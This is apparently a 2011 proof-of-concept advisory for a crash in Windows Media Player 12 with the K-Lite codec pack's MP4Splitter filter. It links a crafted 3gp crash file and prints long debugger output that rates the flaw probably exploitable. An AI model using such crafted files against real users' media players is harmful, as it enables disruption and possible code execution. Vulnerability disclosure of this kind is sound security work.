Greetings,
There is a DOS condition on windows media player when the klite codec pack
is installed.
# Exploit Title: Windows Media Player with klite codec pack DOS Poc
# Date: 14/06/2011
# Author: Nicolas Krassas , www.twitter.com/dinosn
# Version:Windows Media Player 12
# Tested on: Windows 7
The 3gp handling from MP4Splitter.ax filter of klite codec pack will cause
an Access violation when a specially crafted movie file is loaded on the
media player. The same crash will occur also when the file is loaded on a
playlist and the media player will try to generate thumbnail image of the
contents.
File at: http://www.deventum.com/research/Crash_WMplayer.3gp
Mirror: http://www.exploit-db.com/sploits/Crash_WMplayer.3gp
Debug info,
Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.
*** wait with pending attach
Symbol search path is: SRV*c:\Symbols*
http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00340000 0036c000 C:\Program Files\Windows Media
Player\wmplayer.exe
ModLoad: 773e0000 7751c000 C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 76390000 76464000 C:\Windows\system32\kernel32.dll
ModLoad: 75810000 7585a000 C:\Windows\system32\KERNELBASE.dll
ModLoad: 764c0000 76560000 C:\Windows\system32\ADVAPI32.dll
ModLoad: 76230000 762dc000 C:\Windows\system32\msvcrt.dll
ModLoad: 77530000 77549000 C:\Windows\SYSTEM32\sechost.dll
ModLoad: 762e0000 76381000 C:\Windows\system32\RPCRT4.dll
ModLoad: 76560000 76629000 C:\Windows\system32\USER32.dll
ModLoad: 761e0000 7622e000 C:\Windows\system32\GDI32.dll
ModLoad: 75af0000 75afa000 C:\Windows\system32\LPK.dll
ModLoad: 75bf0000 75c8d000 C:\Windows\system32\USP10.dll
ModLoad: 775d0000 77605000 C:\Windows\system32\WS2_32.dll
ModLoad: 77520000 77526000 C:\Windows\system32\NSI.dll
ModLoad: 75db0000 75dcf000 C:\Windows\system32\IMM32.DLL
ModLoad: 75880000 7594c000 C:\Windows\system32\MSCTF.dll
ModLoad: 742a0000 742e0000 C:\Windows\system32\uxtheme.dll
ModLoad: 76790000 773da000 C:\Windows\system32\SHELL32.dll
ModLoad: 75b00000 75b57000 C:\Windows\system32\SHLWAPI.dll
ModLoad: 61cc0000 627b4000 C:\Windows\system32\wmp.dll
ModLoad: 74000000 74190000
C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
ModLoad: 76630000 7678c000 C:\Windows\system32\ole32.dll
ModLoad: 75b60000 75bef000 C:\Windows\system32\OLEAUT32.dll
ModLoad: 73f10000 73f23000 C:\Windows\system32\dwmapi.dll
ModLoad: 60f70000 61b7c000 C:\Windows\system32\wmploc.dll
ModLoad: 754b0000 754bc000 C:\Windows\system32\CRYPTBASE.dll
ModLoad: 74420000 745be000
C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\COMCTL32.dll
ModLoad: 76140000 761c3000 C:\Windows\system32\CLBCatQ.DLL
ModLoad: 68320000 683d2000 C:\Windows\System32\jscript.dll
ModLoad: 74a30000 74a39000 C:\Windows\System32\VERSION.dll
ModLoad: 74fe0000 74ff6000 C:\Windows\system32\CRYPTSP.dll
ModLoad: 74ce0000 74d1b000 C:\Windows\system32\rsaenh.dll
ModLoad: 75510000 7551e000 C:\Windows\system32\RpcRtRemote.dll
ModLoad: 75520000 7557f000 C:\Windows\system32\SXS.DLL
ModLoad: 73d30000 73e2b000 C:\Windows\system32\WindowsCodecs.dll
ModLoad: 73890000 73895000 C:\Windows\system32\MSIMG32.dll
ModLoad: 75580000 7558b000 C:\Windows\system32\profapi.dll
ModLoad: 75950000 75aed000 C:\Windows\system32\SETUPAPI.dll
ModLoad: 75600000 75627000 C:\Windows\system32\CFGMGR32.dll
ModLoad: 75860000 75872000 C:\Windows\system32\DEVOBJ.dll
ModLoad: 742e0000 743d5000 C:\Windows\system32\propsys.dll
ModLoad: 74a00000 74a21000 C:\Windows\system32\ntmarta.dll
ModLoad: 76470000 764b5000 C:\Windows\system32\WLDAP32.dll
ModLoad: 73e60000 73e99000 C:\Windows\System32\MMDevApi.dll
ModLoad: 63320000 63379000 C:\Windows\system32\MFPlat.DLL
ModLoad: 73c70000 73c77000 C:\Windows\system32\AVRT.dll
ModLoad: 64e60000 64e96000 C:\Windows\system32\AUDIOSES.DLL
ModLoad: 6fd30000 6fd8a000 C:\Windows\System32\netprofm.dll
ModLoad: 73880000 73890000 C:\Windows\System32\nlaapi.dll
ModLoad: 6f460000 6f468000 C:\Windows\System32\npmproxy.dll
ModLoad: 70b90000 70bd4000 C:\Windows\system32\upnphost.dll
ModLoad: 70930000 7093d000 C:\Windows\system32\SSDPAPI.dll
ModLoad: 72670000 726a2000 C:\Windows\system32\WINMM.dll
ModLoad: 74b40000 74b4d000 C:\Windows\system32\WTSAPI32.dll
ModLoad: 751a0000 751c9000 C:\Windows\system32\WINSTA.dll
ModLoad: 75c90000 75daa000 C:\Windows\system32\WININET.dll
ModLoad: 76100000 76103000 C:\Windows\system32\Normaliz.dll
ModLoad: 75e30000 75fe6000 C:\Windows\system32\iertutil.dll
ModLoad: 75ff0000 76100000 C:\Windows\system32\urlmon.dll
ModLoad: 75470000 75478000 C:\Windows\system32\Secur32.dll
ModLoad: 75490000 754ab000 C:\Windows\system32\SSPICLI.DLL
ModLoad: 73610000 7361a000 C:\Windows\system32\slc.dll
ModLoad: 64030000 64094000 C:\Windows\system32\imapi2.dll
ModLoad: 74b50000 74b5b000 C:\Windows\system32\pcwum.DLL
ModLoad: 75630000 7565d000 C:\Windows\system32\WINTRUST.dll
ModLoad: 756f0000 7580d000 C:\Windows\system32\CRYPT32.dll
ModLoad: 755f0000 755fc000 C:\Windows\system32\MSASN1.dll
ModLoad: 6a4c0000 6a50c000 C:\Windows\System32\mswmdm.dll
ModLoad: 74e40000 74e84000 C:\Windows\system32\dnsapi.DLL
ModLoad: 72e40000 72e5c000 C:\Windows\system32\iphlpapi.DLL
ModLoad: 72e30000 72e37000 C:\Windows\system32\WINNSI.DLL
ModLoad: 70700000 70727000 C:\Program Files\Common Files\Microsoft
Shared\Windows Live\WLIDNSP.DLL
ModLoad: 761d0000 761d5000 C:\Windows\system32\PSAPI.DLL
ModLoad: 74fa0000 74fdc000 C:\Windows\System32\mswsock.dll
ModLoad: 706d0000 706f5000 C:\Program Files\Bonjour\mdnsNSP.dll
ModLoad: 65fc0000 65ff6000 C:\Windows\system32\upnp.dll
ModLoad: 71450000 714a8000 C:\Windows\system32\WINHTTP.dll
ModLoad: 71400000 7144f000 C:\Windows\system32\webio.dll
ModLoad: 72960000 72966000 C:\Windows\System32\wshqos.dll
ModLoad: 74ac0000 74ac5000 C:\Windows\system32\wshtcpip.DLL
ModLoad: 75000000 75006000 C:\Windows\system32\wship6.dll
ModLoad: 72c30000 72c42000 C:\Windows\system32\dhcpcsvc.DLL
ModLoad: 6b000000 6b036000 C:\Windows\System32\cewmdm.dll
ModLoad: 74f20000 74f28000 C:\Windows\system32\credssp.dll
ModLoad: 6fa90000 6fbc3000 C:\Windows\System32\msxml3.dll
ModLoad: 67cb0000 67d26000 C:\Program Files\Windows Media
Player\wmpnssci.dll
ModLoad: 72cb0000 72cbd000 C:\Windows\system32\dhcpcsvc6.DLL
ModLoad: 70f10000 70f1c000 C:\Windows\System32\wmdmps.dll
ModLoad: 74a40000 74ab6000 C:\Windows\system32\FirewallAPI.dll
ModLoad: 6c340000 6c4af000 C:\Windows\system32\explorerframe.dll
ModLoad: 73ee0000 73f0f000 C:\Windows\system32\DUser.dll
ModLoad: 73f40000 73ff2000 C:\Windows\system32\DUI70.dll
ModLoad: 641a0000 641c7000 C:\Windows\System32\wmpps.dll
ModLoad: 73910000 73962000 C:\Windows\system32\RASAPI32.dll
ModLoad: 738f0000 73905000 C:\Windows\system32\rasman.dll
ModLoad: 738e0000 738ed000 C:\Windows\system32\rtutils.dll
ModLoad: 703b0000 703b6000 C:\Windows\system32\sensapi.dll
ModLoad: 73670000 73695000 C:\Windows\system32\peerdist.dll
ModLoad: 74ba0000 74bb7000 C:\Windows\system32\USERENV.dll
ModLoad: 75180000 7519b000 C:\Windows\system32\AUTHZ.dll
ModLoad: 70370000 70376000 C:\Windows\system32\rasadhlp.dll
ModLoad: 72cc0000 72cf8000 C:\Windows\System32\fwpuclnt.dll
ModLoad: 731d0000 731dd000 C:\Program Files\Common Files\Microsoft
Shared\OFFICE14\MSOXMLMF.DLL
ModLoad: 711e0000 71283000
C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.5570_none_509463cabcb6ef2a\MSVCR90.dll
ModLoad: 73e30000 73e5f000 C:\Windows\system32\XmlLite.dll
ModLoad: 6f310000 6f319000 C:\Windows\system32\LINKINFO.dll
(2730.1a14): Break instruction exception - code 80000003 (first chance)
eax=7ff9e000 ebx=00000000 ecx=00000000 edx=7747f125 esi=00000000
edi=00000000
eip=774140f0 esp=01a9feb4 ebp=01a9fee0 iopl=0 nv up ei pl zr na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000246
ntdll!DbgBreakPoint:
774140f0 cc int 3
0:029> g
ModLoad: 754c0000 7550c000 C:\Windows\system32\apphelp.dll
ModLoad: 10000000 10017000
C:\Users\Dinos\AppData\Roaming\Dropbox\bin\DropboxExt.14.dll
ModLoad: 733d0000 734bb000 C:\Windows\system32\dbghelp.dll
ModLoad: 7c3a0000 7c41b000
C:\Users\Dinos\AppData\Roaming\Dropbox\bin\MSVCP71.dll
ModLoad: 7c340000 7c396000
C:\Users\Dinos\AppData\Roaming\Dropbox\bin\MSVCR71.dll
ModLoad: 6e660000 6e691000 C:\Windows\system32\EhStorShell.dll
ModLoad: 6bb20000 6bf2b000 GrooveEX.DLL
ModLoad: 6bb20000 6bf2b000 C:\PROGRA~1\MIF5BA~1\Office14\GROOVEEX.DLL
ModLoad: 71140000 711ce000
C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.5570_none_509463cabcb6ef2a\MSVCP90.dll
ModLoad: 6e630000 6e65b000
C:\Windows\WinSxS\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.5570_none_51ce1f16bbe3e56e\ATL90.DLL
ModLoad: 6bf30000 6c33f000
C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf
ModLoad: 6b2b0000 6bb14000
C:\PROGRA~1\MIF5BA~1\Office14\1033\GrooveIntlResource.dll
ModLoad: 64720000 6478a000 C:\Windows\System32\cscui.dll
ModLoad: 737d0000 737d9000 C:\Windows\System32\CSCDLL.dll
ModLoad: 70940000 7094b000 C:\Windows\system32\CSCAPI.dll
ModLoad: 64680000 646f0000 C:\Windows\system32\ntshrui.dll
ModLoad: 75400000 75419000 C:\Windows\system32\srvcli.dll
ModLoad: 6f720000 6f7c0000 C:\Windows\system32\SearchFolder.dll
ModLoad: 73010000 73026000 C:\Windows\system32\thumbcache.dll
ModLoad: 6de20000 6e132000 C:\Windows\system32\MF.dll
ModLoad: 73620000 73634000 C:\Windows\system32\ATL.DLL
ModLoad: 64e20000 64e24000 C:\Windows\system32\ksuser.dll
ModLoad: 67510000 67569000 C:\Windows\System32\wmpeffects.dll
ModLoad: 682f0000 682fb000 C:\Windows\System32\msdmo.dll
ModLoad: 66f70000 66fea000 C:\Windows\System32\evr.dll
ModLoad: 73c80000 73ca5000 C:\Windows\System32\POWRPROF.dll
ModLoad: 70f20000 70f38000 C:\Windows\system32\DXVA2.DLL
ModLoad: 628f0000 62ab3000 C:\Windows\system32\D3D9.DLL
ModLoad: 730f0000 730f6000 C:\Windows\system32\d3d8thk.dll
ModLoad: 58eb0000 5985a000 C:\Windows\system32\nvd3dum.dll
(2730.1d98): C++ EH exception - code e06d7363 (first chance)
ModLoad: 684a0000 684ec000 C:\Windows\System32\mfds.dll
ModLoad: 65e10000 65f87000 C:\Windows\system32\quartz.dll
ModLoad: 65320000 65334000 C:\Windows\system32\devenum.dll
ModLoad: 088e0000 089db000 C:\Program Files\K-Lite Codec
Pack\Filters\vsfilter.dll
ModLoad: 77550000 775cb000 C:\Windows\system32\COMDLG32.dll
ModLoad: 70570000 705c1000 C:\Windows\system32\WINSPOOL.DRV
ModLoad: 67360000 673cc000 C:\Program Files\K-Lite Codec
Pack\Filters\FLVSplitter.ax
ModLoad: 66d80000 66e2e000 C:\Program Files\K-Lite Codec
Pack\Filters\MP4Splitter.ax
(2730.1d98): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=66d8bed0 ebx=00000000 ecx=00000000 edx=0691ef40 esi=08e9fe28
edi=08e9fe50
eip=66d8bef1 esp=0691ee78 ebp=00000000 iopl=0 nv up ei pl nz na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Program Files\K-Lite Codec Pack\Filters\MP4Splitter.ax -
MP4Splitter!DllRegisterServer+0x5a41:
66d8bef1 8b01 mov eax,dword ptr [ecx]
ds:0023:00000000=????????
0:031> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x0
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation
Faulting Instruction:66d8bef1 mov eax,dword ptr [ecx]
Basic Block:
66d8bef1 mov eax,dword ptr [ecx]
Tainted Input Operands: ecx
66d8bef3 mov eax,dword ptr [eax+30h]
Tainted Input Operands: eax
66d8bef6 push ebx
66d8bef7 mov ebx,dword ptr [esp+38h]
66d8befb lea edx,[esp+1ch]
66d8beff push edx
66d8bf00 lea edx,[esp+10h]
66d8bf04 push edx
66d8bf05 lea edx,[esp+40h]
66d8bf09 push edx
66d8bf0a inc ebx
66d8bf0b push ebx
66d8bf0c call eax
Tainted Input Operands: eax, ecx
Exception Hash (Major/Minor): 0x312e650b.0x312e1f0b
Stack Trace:
MP4Splitter!DllRegisterServer+0x5a41
Instruction Address: 0x0000000066d8bef1
Description: Data from Faulting Address controls Code Flow
Short Description: TaintedDataControlsCodeFlow
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting Address
controls Code Flow starting at
MP4Splitter!DllRegisterServer+0x0000000000005a41
(Hash=0x312e650b.0x312e1f0b)
The data from the faulting address is later used as the target for a branch.